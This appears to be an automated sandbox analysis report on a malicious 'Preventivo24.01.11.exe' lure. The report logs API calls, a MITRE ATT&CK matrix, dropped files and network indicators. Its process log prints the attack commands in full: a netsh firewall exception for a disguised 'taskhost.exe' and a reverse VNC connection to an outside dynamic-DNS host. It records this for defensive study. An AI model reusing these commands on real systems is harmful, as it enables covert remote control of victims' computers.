Source: taskhost.exe, 0000002A.00000002.3221941378.0000000000EEF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\wbem\WMIC.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00BEF843 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00BEF843

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00B56910 CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,OutputDebugStringW,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,

0_2_00B56910

Source: C:\Games\taskhost.exe

42_2_005A57B0

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00B20CA0 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_00B20CA0

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00BEA1CE mov esi, dword ptr fs:[00000030h]	0_2_00BEA1CE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00C047DA mov eax, dword ptr fs:[00000030h]	0_2_00C047DA
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00C04796 mov eax, dword ptr fs:[00000030h]	0_2_00C04796
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00BF5EA4 mov ecx, dword ptr fs:[00000030h]	0_2_00BF5EA4
Source: C:\Games\viewer.exe	Code function: 7_2_0099B9CA mov eax, dword ptr fs:[00000030h]	7_2_0099B9CA
Source: C:\Games\viewer.exe	Code function: 7_2_00993C84 mov eax, dword ptr fs:[00000030h]	7_2_00993C84
Source: C:\Games\taskhost.exe	Code function: 42_2_006BC838 mov eax, dword ptr fs:[00000030h]	42_2_006BC838
Source: C:\Games\taskhost.exe	Code function: 42_2_006AD615 mov ecx, dword ptr fs:[00000030h]	42_2_006AD615
Source: C:\Games\taskhost.exe	Code function: 42_2_006BC7F4 mov eax, dword ptr fs:[00000030h]	42_2_006BC7F4

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00BEA23A GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,

0_2_00BEA23A

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00A22520 __set_se_translator,SetUnhandledExceptionFilter,	0_2_00A22520
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00BEACAE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00BEACAE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00A25180 __set_se_translator,SetUnhandledExceptionFilter,	0_2_00A25180
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00BEF843 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00BEF843
Source: C:\Games\viewer.exe	Code function: 7_2_00989256 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00989256
Source: C:\Games\viewer.exe	Code function: 7_2_00985248 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00985248
Source: C:\Games\viewer.exe	Code function: 7_2_009853DE SetUnhandledExceptionFilter,	7_2_009853DE
Source: C:\Games\viewer.exe	Code function: 7_2_009847F5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_009847F5
Source: C:\Games\taskhost.exe	Code function: 42_2_0069C87C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_0069C87C
Source: C:\Games\taskhost.exe	Code function: 42_2_00698A67 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	42_2_00698A67

Source: C:\Games\viewer.exe

Code function: 7_2_00965210 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,GetModuleHandleW,GetProcAddress,CloseHandle,Sleep,Sleep,EnumWindows,BringWindowToTop,

7_2_00965210

Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description	Jump to behavior
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mode.com Mode 90,20	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5402254 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f	Jump to behavior

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Process created: C:\Windows\SysWOW64\msiexec.exe c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\photo and fax vn\photo and vn 1.1.2\install\f97891c\main1.msi" ai_setupexepath=c:\users\user\desktop\preventivo24.01.11.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1706007874 " ai_euimsi="
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Process created: C:\Windows\SysWOW64\msiexec.exe c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\photo and fax vn\photo and vn 1.1.2\install\f97891c\main1.msi" ai_setupexepath=c:\users\user\desktop\preventivo24.01.11.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1706007874 " ai_euimsi="			Jump to behavior

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00B19280 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,FindCloseChangeNotification,

0_2_00B19280

Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	Binary or memory string: Program Manager
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	Binary or memory string: Shell_TrayWnd
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	Binary or memory string: Progman
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	Binary or memory string: UltraVNC.ini -settingshelperShell_TrayWnd%dpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-00B0D07B8C7C}
Source: taskhost.exe.0.dr	Binary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitplaceholder1placeholder2restartvncDesktop::~vncDesktop : ~vncDesktop

Source: C:\Games\viewer.exe

Code function: 7_2_00985448 cpuid

7_2_00985448

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,	0_2_00B4B480
Source: C:\Games\viewer.exe	Code function: GetLocaleInfoW,	7_2_0099F04D
Source: C:\Games\viewer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_0099F173
Source: C:\Games\viewer.exe	Code function: GetLocaleInfoW,	7_2_0099F279
Source: C:\Games\viewer.exe	Code function: GetLocaleInfoW,	7_2_009983B3
Source: C:\Games\viewer.exe	Code function: GetLocaleInfoEx,___wcsnicmp_ascii,	7_2_0098433F
Source: C:\Games\viewer.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	7_2_0099F348
Source: C:\Games\viewer.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,	7_2_0098440A
Source: C:\Games\viewer.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	7_2_0099E9E7
Source: C:\Games\viewer.exe	Code function: EnumSystemLocalesW,	7_2_0099EC89
Source: C:\Games\viewer.exe	Code function: EnumSystemLocalesW,	7_2_0099ECD4
Source: C:\Games\viewer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	7_2_0099EDFA
Source: C:\Games\viewer.exe	Code function: EnumSystemLocalesW,	7_2_0099ED6F
Source: C:\Games\viewer.exe	Code function: EnumSystemLocalesW,	7_2_00997E3A

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Games\taskhost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Games\taskhost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00B63AD0 CreateNamedPipeW,CreateFileW,

0_2_00B63AD0

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00B56820 GetLocalTime,

0_2_00B56820

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00B62440 GetUserNameW,GetLastError,GetUserNameW,GetEnvironmentVariableW,GetEnvironmentVariableW,RegDeleteValueW,RegCloseKey,RegQueryInfoKeyW,RegCloseKey,RegCloseKey,RegDeleteKeyW,RegCloseKey,RegDeleteValueW,RegCloseKey,

0_2_00B62440

Source: C:\Games\viewer.exe

Code function: 7_2_009987C3 _free,_free,_free,GetTimeZoneInformation,_free,

7_2_009987C3

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_009E7AA0 GetVersionExW,GetVersionExW,IsProcessorFeaturePresent,

0_2_009E7AA0

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the windows firewall

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL

Remote Access Functionality

Contains VNC / remote desktop functionality (version string found)

Source: taskhost.exe, 0000002A.00000002.3221941378.0000000000EEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: RFB 003.008
Source: taskhost.exe, 0000002A.00000002.3223498876.000000000361D000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: RFB 003.008

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
1 Spearphishing Link	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	21 Disable or Modify Tools	OS Credential Dumping	2 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	1 System Shutdown/Reboot	Acquire Infrastructure	Gather Victim Identity Information
1 Valid Accounts	3 Native API	1 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Peripheral Device Discovery	1 Replication Through Removable Media	Data from Removable Media	Exfiltration Over Bluetooth	11 Encrypted Channel	SIM Card Swap	Obtain Device Cloud Backups	1 Defacement	Domains	Credentials
1 Replication Through Removable Media	11 Command and Scripting Interpreter	1 Bootkit	1 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Standard Port			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	1 Access Token Manipulation	1 Timestomp	NTDS	5 File and Directory Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	1 Remote Access Software			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	13 Process Injection	1 DLL Side-Loading	LSA Secrets	37 System Information Discovery	SSH	Keylogging	Scheduled Transfer	3 Non-Application Layer Protocol			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Query Registry	VNC	GUI Input Capture	Data Transfer Size Limits	14 Application Layer Protocol			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Valid Accounts	DCSync	141 Security Software Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	Commonly Used Port			Inhibit System Recovery	Web Services	DNS
Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Exfiltration Over Alternative Protocol	Application Layer Protocol			Defacement	Serverless	Network Trust Dependencies
Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	3 Process Discovery	Direct Cloud VM Connections	Data Staged	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Web Protocols			Internal Defacement	Malvertising	Network Topology
Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	File Transfer Protocols			External Defacement	Compromise Infrastructure	IP Addresses
Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	13 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Exfiltration Over Unencrypted Non-C2 Protocol	Mail Protocols			Firmware Corruption	Domains	Network Security Appliances
Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Bootkit	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	Exfiltration Over Physical Medium	DNS			Resource Hijacking	DNS Server	Gather Victim Org Information

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Preventivo24.01.11.exe	8%	ReversingLabs
Preventivo24.01.11.exe	17%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\MSI5406.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI5406.tmp	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\MSI54A3.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI54A3.tmp	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\MSI54C4.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI54C4.tmp	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\shi5398.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\shi5398.tmp	0%	Virustotal	Browse
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\taskhost.exe	8%	ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\taskhost.exe	10%	Virustotal	Browse
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\viewer.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\viewer.exe	1%	Virustotal	Browse
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll	0%	Virustotal	Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://html4/loose.dtd	0%	Avira URL Cloud	safe
http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1	0%	Virustotal		Browse
http://.css	0%	Avira URL Cloud	safe
https://forum.uvnc.comvncMenu::WndProc	0%	Avira URL Cloud	safe
http://oneocsp.microe	0%	Avira URL Cloud	safe
https://www.uvnc.comhttps://forum.uvnc.comnet	0%	Avira URL Cloud	safe
https://www.uvnc.comcmd	0%	Avira URL Cloud	safe
http://java.sun.com/products/plugin/index.html#download	0%	Avira URL Cloud	safe
http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1	0%	Avira URL Cloud	safe
http://.jpg	0%	Avira URL Cloud	safe
http://java.sun.com/products/plugin/index.html#download	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.example.com	93.184.216.34	true	false		high
vnvariant2024.ddnsfree.com	140.228.29.110	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.example.com/download/updates.txt	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	shi5398.tmp.0.dr	false	Avira URL Cloud: safe	low
http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1	Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B2D6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000000.2174705873.00000000006E3000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.sectigo.com0	Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe	unknown
http://ocsp.thawte.com0	Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr	false	URL Reputation: safe	unknown
http://www.pdf-tools.com	Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ~.pdf.0.dr	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe	unknown
https://www.uvnc.com	taskhost.exe.0.dr	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe	unknown
http://.css	shi5398.tmp.0.dr	false	Avira URL Cloud: safe	low
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	false	URL Reputation: safe URL Reputation: safe	unknown
https://forum.uvnc.com	taskhost.exe.0.dr	false		high
https://www.uvnc.comcmd	Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	false	Avira URL Cloud: safe	unknown
